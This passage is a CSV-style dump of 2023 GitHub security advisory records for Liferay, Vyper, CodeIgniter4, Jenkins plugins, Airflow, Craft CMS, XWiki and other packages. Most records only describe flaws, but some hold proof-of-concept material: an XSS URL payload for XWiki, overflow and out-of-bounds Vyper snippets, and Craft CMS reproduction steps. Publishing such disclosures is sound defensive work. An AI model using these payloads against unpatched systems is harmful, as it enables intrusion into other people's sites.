'https://nvd.nist.gov/vuln/detail/CVE-2023-2999'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/937913948cab382a38f681e0bd29c152e2f383cd'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4d89c7cc-fb4c-4b64-9b67-f0189f70a620'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:53:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-p9xg-9378-cqp7,2023-05-24T18:04:46Z,2023-05-24T15:30:27Z,,['CVE-2023-33943'],Cross-site scripting in Liferay Portal,"Cross-site scripting (XSS) vulnerability in the Account module in Liferay Portal 7.4.3.21 through 7.4.3.62, and Liferay DXP 7.4 update 21 through 62 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user's (1) First Name, (2) Middle Name, (3) Last Name, or (4) Job Title text field.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.3.21'}, {'fixed': '7.4.3.63'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33943'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33943'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T18:04:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-6r8q-pfpv-7cgj,2023-06-06T17:05:30Z,2023-05-12T20:21:35Z,,['CVE-2023-32058'],Vyper vulnerable to integer overflow in loop,"### Impact Due to missing overflow check for loop variables, by assigning the iterator of a loop to a variable, it is possible to overflow the type of the latter. In the following example, calling `test` returns `354`, meaning that the variable `a` did store `354` a value out of bound for the type `uint8`. ```Vyper @external def test() -> uint16: x:uint8 = 255 a:uint8 = 0 for i in range(x, x+100): a = i return convert(a,uint16) ``` The issue seems to happen only in loops of type `for i in range(a, a + N)` as in loops of type `for i in range(start, stop)` and `for i in range(stop)`, the compiler is able to raise a `TypeMismatch` when trying to overflow the variable. thanks to @trocher for reporting ### Patches patched in 3de1415ee77a9244eb04bdb695e249d3ec9ed868 ### Workarounds ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-6r8q-pfpv-7cgj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32058'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/3de1415ee77a9244eb04bdb695e249d3ec9ed868'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-78.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:21:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-3p37-3636-q8wv,2023-06-06T17:05:03Z,2023-05-12T20:21:54Z,,['CVE-2023-31146'],Vyper vulnerable to OOB DynArray access when array is on both LHS and RHS of an assignment,"### Impact during codegen, the length word of a dynarray is written before the data, which can result in OOB array access in the case where the dynarray is on both the lhs and rhs of an assignment. here is a minimal example producing the issue: ```vyper a:DynArray[uint256,3] @external def test() -> DynArray[uint256,3]: self.a = [1,2,3] self.a = empty(DynArray[uint256,3]) self.a = [self.a[0],self.a[1],self.a[2]] return self.a # return [1,2,3] ``` and here is an example demonstrating the issue can cause data corruption across call frames: ```vyper @external def test() -> DynArray[uint256,3]: self.a() return self.b() # return [1,2,3] @internal def a(): a: uint256 = 0 b: uint256 = 1 c: uint256 = 2 d: uint256 = 3 @internal def b() -> DynArray[uint256,3]: a: DynArray[uint256,3] = empty(DynArray[uint256,3]) a = [a[0],a[1],a[2]] return a ``` examples involving append and pop: ```vyper @internal def foo(): c: DynArray[uint256, 1] = [] c.append(c[0]) ``` ```vyper @internal def foo(): c: DynArray[uint256, 1] = [1] c[0] = c.pop() ``` the expected behavior in all of the above cases is to revert due to oob array access. ### Patches patched in 4f8289a81206f767df1900ac48f485d90fc87edb ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References _Are there any links users can visit to find out more?_ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-3p37-3636-q8wv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31146'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/4f8289a81206f767df1900ac48f485d90fc87edb'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-77.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:21:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-m6m8-6gq8-c9fj,2023-05-23T16:22:59Z,2023-05-22T19:49:11Z,,['CVE-2023-32692'],Remote Code Execution Vulnerability in Validation Placeholders in CodeIgniter4,"### Impact This vulnerability allows attackers to execute arbitrary code when you use Validation Placeholders. The vulnerability exists in the Validation library, and validation methods in the controller and in-model validation are also vulnerable because they use the Validation library internally. ### Patches Upgrade to v4.3.5 or later. ### Workarounds Setting validation rules with an array. E.g.: ```php $validation->setRules([ 'email' => ['required', 'valid_email, 'is_unique[users.email,id,{id}]'], ]); ``` ### References - https://codeigniter4.github.io/userguide/libraries/validation.html#validation-placeholders - https://codeigniter4.github.io/userguide/incoming/controllers.html#validating-data - https://codeigniter4.github.io/userguide/models/model.html#in-model-validation","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'codeigniter4/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-m6m8-6gq8-c9fj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32692'}, {'type': 'WEB', 'url': 'https://github.com/codeigniter4/CodeIgniter4/commit/6af677177fa1d9ad62f7a793bc96cba3068632ba'}, {'type': 'PACKAGE', 'url': 'https://github.com/codeigniter4/CodeIgniter4'}, {'type': 'WEB', 'url': 'https://github.com/codeigniter4/CodeIgniter4/blob/develop/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/codeigniter4/CodeIgniter4/blob/develop/CHANGELOG.md#v435-2023-05-21'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T19:49:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-7p6g-gr9g-vfx6,2023-05-17T03:43:22Z,2023-05-16T18:30:16Z,,['CVE-2023-33007'],Jenkins LoadComplete support Plugin Cross-site Scripting vulnerability,"Jenkins LoadComplete support Plugin 1.0 and earlier does not escape the LoadComplete test name in its test result page. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:loadcomplete'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33007'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2903'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:43:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-gx2j-5vc3-3794,2023-05-17T17:07:09Z,2023-05-16T21:30:22Z,,['CVE-2023-2195'],Jenkins Code Dx Plugin cross-site request forgery vulnerability,"Jenkins Code Dx Plugin 3.1.0 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to connect to an attacker-specified URL. Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability. Code Dx Plugin 4.0.0 requires POST requests and the appropriate permissions for the affected HTTP endpoints.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:codedx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2195'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3118'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T17:07:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-vpf7-r2fv-75m9,2023-05-05T02:19:39Z,2023-05-05T02:19:39Z,,['CVE-2023-27321'],Uncontrolled Resource Consumption in OPC UA .NET Standard Reference Server,"This security update resolves a vulnerability in the OPC UA .NET Standard Reference Server that allows remote attackers to send malicious requests that consume all memory available to the server. https://files.opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2023-27321.pdf","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'OPCFoundation.NetStandard.Opc.Ua.Server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.371.86'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/security/advisories/GHSA-vpf7-r2fv-75m9'}, {'type': 'PACKAGE', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:19:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-94q4-v5g6-qp7x,2023-05-23T22:39:34Z,2023-05-12T12:30:18Z,,['CVE-2023-27237'],LavaLite CMS vulnerable to host header injection attack,LavaLite CMS v 9.0.0 was discovered to be vulnerable to a host header injection attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'lavalite/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '9.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27237'}, {'type': 'PACKAGE', 'url': 'https://github.com/LavaLite/cms'}, {'type': 'WEB', 'url': 'https://github.com/M19O/Security-Advisories/tree/main/CVE-2023-27237'}, {'type': 'WEB', 'url': 'https://i.ibb.co/34DSW7B/1.png'}, {'type': 'WEB', 'url': 'https://i.ibb.co/kSkqPhQ/3.png'}, {'type': 'WEB', 'url': 'https://i.ibb.co/mJq9CH8/2.png'}, {'type': 'WEB', 'url': 'http://lavalite.com'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:16:19Z', 'nvd_published_at': None}" 1.4.0,GHSA-wc64-c5rv-32pf,2023-05-11T20:47:56Z,2023-05-11T20:47:56Z,,['CVE-2023-32076'],in-toto vulnerable to Configuration Read From Local Directory,"### Impact The in-toto configuration is read from various directories and allows users to configure the behavior of the framework. The files are from directories following the XDG base directory specification [1]. Among the files read is `.in_totorc` which is a hidden file in the directory in which in-toto is run. If an attacker controls the inputs to a supply chain step, they can mask their activities by also passing in an `.in_totorc` file that includes the necessary exclude patterns and settings. RC files are widely used in other systems [2] and security issues have been discovered in their implementations as well [3]. We found in our conversations with in-toto adopters that `in_totorc` is not their preferred way to configure in-toto. As none of the options supported in `in_totorc` is unique, and can be set elsewhere using API parameters or CLI arguments, we decided to drop support for `in_totorc`. ### Other Recommendations Sandbox functionary code as recommended in https://github.com/in-toto/docs/security/advisories/GHSA-p86f-xmg6-9q4x. ### References [1] https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html [2] https://spec.editorconfig.org/ [3] https://github.blog/2022-04-12-git-security-vulnerability-announced/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'in-toto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/in-toto/docs/security/advisories/GHSA-p86f-xmg6-9q4x'}, {'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto/security/advisories/GHSA-wc64-c5rv-32pf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32076'}, {'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto/commit/3a21d84f40811b7d191fa7bd17265c1f99599afd'}, {'type': 'PACKAGE', 'url': 'https://github.com/in-toto/in-toto'}, {'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto/releases/tag/v2.0.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/in-toto/PYSEC-2023-63.yaml'}, {'type': 'WEB', 'url': 'https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html'}]","{'cwe_ids': ['CWE-15', 'CWE-610'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:47:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-jchm-fm4q-c2fp,2023-06-06T17:46:53Z,2023-05-08T12:30:29Z,,['CVE-2023-25754'],Apache Airflow vulnerable to Privilege Context Switching Error,"Privilege Context Switching Error vulnerability in Apache Software Foundation Apache Airflow. This issue affects Apache Airflow: before 2.6.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25754'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29506'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/releases/tag/2.6.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-59.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/3y83gr0qb8t49ppfk4fb2yk7md8ltq4v'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/05/08/2'}]","{'cwe_ids': ['CWE-270'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:32:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-vcf6-3wv2-5vcr,2023-05-12T15:24:34Z,2023-05-08T12:30:28Z,,['CVE-2023-29247'],Apache Airflow vulnerable to stored Cross-site Scripting,"Task instance details page in the UI is vulnerable to stored cross-site scripting. This issue affects Apache Airflow before 2.6.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29247'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/30447'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/30779'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-60.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/kqf5lxmko133780clsp827xfsh4xd3fl'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-08T20:25:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-2f89-66v2-9p53,2023-05-17T03:04:45Z,2023-05-16T18:30:16Z,,['CVE-2023-32980'],Jenkins Email Extension Plugin Cross-Site Request Forgery vulnerability,"Jenkins Email Extension Plugin 2.96 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This allows attackers to make another user stop watching an attacker-specified job. Email Extension Plugin 2.96.1 requires POST requests for the affected HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:email-ext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.96.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32980'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3088%20(2)'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:04:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-6phf-6h5g-97j2,2023-06-02T22:05:04Z,2023-05-23T20:07:58Z,,['CVE-2023-32697'],Sqlite-jdbc vulnerable to remote code execution when JDBC url is attacker controlled,"## Summary Sqlite-jdbc addresses a remote code execution vulnerability via JDBC URL. ## Impacted versions : 3.6.14.1-3.41.2.1 ## References https://github.com/xerial/sqlite-jdbc/releases/tag/3.41.2.2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xerial:sqlite-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.6.14.1'}, {'fixed': '3.41.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xerial/sqlite-jdbc/security/advisories/GHSA-6phf-6h5g-97j2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32697'}, {'type': 'PACKAGE', 'url': 'https://github.com/xerial/sqlite-jdbc'}, {'type': 'WEB', 'url': 'https://github.com/xerial/sqlite-jdbc/releases/tag/3.41.2.2'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-23T20:07:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-v6m2-j92j-2h78,2023-05-31T15:56:41Z,2023-05-24T15:30:27Z,,['CVE-2023-33937'],Cross-site scripting in Liferay Portal,"Stored cross-site scripting (XSS) vulnerability in Form widget configuration in Liferay Portal 7.1.0 through 7.3.0, and Liferay DXP 7.1 before fix pack 18, and 7.2 before fix pack 5 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a form's `name` field. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.1.0'}, {'fixed': '7.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33937'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33937'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T18:04:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-cjmm-x9x9-m2w5,2023-05-26T21:50:36Z,2023-05-26T13:55:42Z,,['CVE-2023-33196'],Craft CMS stored XSS in review volume,"### Summary XSS can be triggered by review volumes ### PoC 1. Access setting tab 2. Create new assets 3. In assets name inject payload: "" 4. Click Utilities tab 5. Choose all volumes, or volume trigger xss 6. Click Update asset indexes. 7. Wait to assets update success. 8. Progress complete. 9. Click on review button will trigger XSS ### Root cause Function: index.php?p=admin/actions/asset-indexes/process-indexing-session&v=1680710595770 After loading completed, progess will load: ""skippedEntries"" and ""missingEntries"" These parameters is not yet filtered, I just tried ""skippedEntries"" but I think it will be work with ""missingEntries"" ### My reponse: { ""session"": { ""id"": 10, ""indexedVolumes"": { ""6"": ""\"""" }, ""totalEntries"": 2235, ""processedEntries"": 2235, ""cacheRemoteImages"": true, ""listEmptyFolders"": false, ""isCli"": false, ""actionRequired"": true, ""dateCreated"": ""Apr 5, 2023, 9:03:16 AM"", ""skippedEntries"": [ ""\""/assetpreviews/Image.php"", ""\""/assetpreviews/Pdf.php"" ], ""missingEntries"": { ""folders"": [], ""files"": [] }, ""processIfRootEmpty"": false }, ""skipDialog"": false } Resolved in https://github.com/craftcms/cms/commit/053d7119697e480ff81c5723bb9a33eaa49e0fc7","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-RC1'}, {'fixed': '4.4.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.4.6'}}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-cjmm-x9x9-m2w5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33196'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/053d7119697e480ff81c5723bb9a33eaa49e0fc7'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/releases/tag/4.4.7'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T13:55:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-r364-2pj4-pf7f,2023-06-08T14:01:20Z,2023-05-27T21:30:15Z,,['CVE-2015-20108'],ruby-saml vulnerable to XPath injection,`xml_security.rb` in the ruby-saml gem before 1.0.0 for Ruby allows XPath injection and code execution because prepared statements are not used.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'ruby-saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-20108'}, {'type': 'WEB', 'url': 'https://github.com/SAML-Toolkits/ruby-saml/pull/225'}, {'type': 'WEB', 'url': 'https://github.com/SAML-Toolkits/ruby-saml/commit/9853651b96b99653ea8627d757d46bfe62ab6448'}, {'type': 'PACKAGE', 'url': 'https://github.com/SAML-Toolkits/ruby-saml'}, {'type': 'WEB', 'url': 'https://github.com/SAML-Toolkits/ruby-saml/compare/v0.9.2...v1.0.0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ruby-saml/CVE-2015-20108.yml'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ruby-saml/OSVDB-124991.yml'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230703-0003/'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-RUBY-RUBYSAML-20217'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T00:24:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-j9h5-vcgv-2jfm,2023-05-09T18:44:13Z,2023-05-09T17:46:22Z,,['CVE-2023-32071'],XWiki Platform vulnerable to RXSS via editor parameter - importinline template,"### Impact It's possible to execute javascript with the right of any user by leading him to a special URL on the wiki targeting a page which contains an attachment. To reproduce: * add an attachment to a page (for example, your user profile) * add `?xpage=importinline&editor=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%3E` to the page view URL as in `https://myhost/xwiki/bin/view/XWiki/MyUser?xpage=importinline&editor=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%3E` ### Patches This has been patched in XWiki 15.0-rc-1, 14.10.4 and 14.4.8. ### Workarounds The easiest is to edit file `/templates/importinline.vm` and apply the modification described on https://github.com/xwiki/xwiki-platform/commit/28905f7f518cc6f21ea61fe37e9e1ed97ef36f01 ### References https://jira.xwiki.org/browse/XWIKI-20340 https://app.intigriti.com/company/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-E93DFEYK ### Attribution This vulnerability has been reported on Intigriti by René de Sain @renniepak.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-distribution-war'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2-milestone-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-distribution-war'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-j9h5-vcgv-2jfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32071'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/28905f7f518cc6f21ea61fe37e9e1ed97ef36f01'}, {'type': 'WEB', 'url': 'https://app.intigriti.com/company/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-E93DFEYK'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20340'}]","{'cwe_ids': ['CWE-116', 'CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-09T17:46:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-pfwc-4frf-4gf8,2023-06-06T17:11:06Z,2023-05-24T18:30:26Z,,['CVE-2023-33944'],Cross-site scripting in Liferay Portal,"Cross-site scripting (XSS) vulnerability in Layout module in Liferay Portal 7.3.4 through 7.4.3.68, and Liferay DXP 7.3 before update 24, and 7.4 before update 69 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a container type layout fragment's `URL` text field.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.3.4'}, {'fixed': '7.4.3.69'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33944'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33944'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:52:24Z', 'nvd_published_at': None}" 